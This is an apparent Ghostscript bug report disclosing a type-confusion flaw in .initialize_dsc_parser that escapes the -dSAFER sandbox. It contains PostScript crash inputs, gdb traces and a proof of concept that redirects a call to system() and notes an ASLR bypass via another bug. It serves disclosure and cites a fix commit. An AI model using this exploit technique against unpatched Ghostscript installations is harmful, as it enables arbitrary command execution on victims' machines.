.initialize_dsc_parser doesn't validate the parameter is a dict type before using it. This is a security issue, because it can be abused to escape the -dSAFER sandbox. GS>16#4141414141414141 .initialize_dsc_parser Program received signal SIGSEGV, Segmentation fault. 0x0000000000a65754 in zinitialize_dsc_parser (i_ctx_p=0x1dd0af0) at ./psi/zdscpars.c:154 154 gs_memory_t * const mem = (gs_memory_t *)dict_memory(pdict); (gdb) x/i $pc => 0xa65754 <zinitialize_dsc_parser+43>: mov rax,QWORD PTR [rax+0x48] (gdb) p/x $rax $3 = 0x4141414141414141 Or trying random other types: GS>currentdevice .initialize_dsc_parser Program received signal SIGSEGV, Segmentation fault. 0x0000000000a65775 in zinitialize_dsc_parser (i_ctx_p=0x1dd0af0) at ./psi/zdscpars.c:155 155 dsc_data_t * const data = (gdb) x/i $pc => 0xa65775 <zinitialize_dsc_parser+76>: call rax (gdb) p/x $rax $10 = 0xc045894cc84d89cc (gdb) x/x $rax 0xc045894cc84d89cc: Cannot access memory at address 0xc045894cc84d89cc
This looks pretty simple to exploit, it's possible to bypass ASLR using bug 697169 and reading /proc/self/maps, then you can simply call any routine you want. (gdb) p system $1 = {int (const char *)} 0x7ffff6ef4220 <system> (gdb) r GPL Ghostscript 9.20 (2016-09-26) Copyright (C) 2016 Artifex Software, Inc. All rights reserved. This software comes with NO WARRANTY: see the file PUBLIC for details. GS>16#4141414141414141 [16#4141414141414141 16#4141414141414141 16#7ffff6ef4220 16#4141414141414141] .initialize_dsc_parser sh: -c: line 0: syntax error near unexpected token `)' sh: -c: line 0: ` hU)iAAAAAAAA|��'
Fixed in commit 875a0095f37626a721c7ff57d606a0f95af03913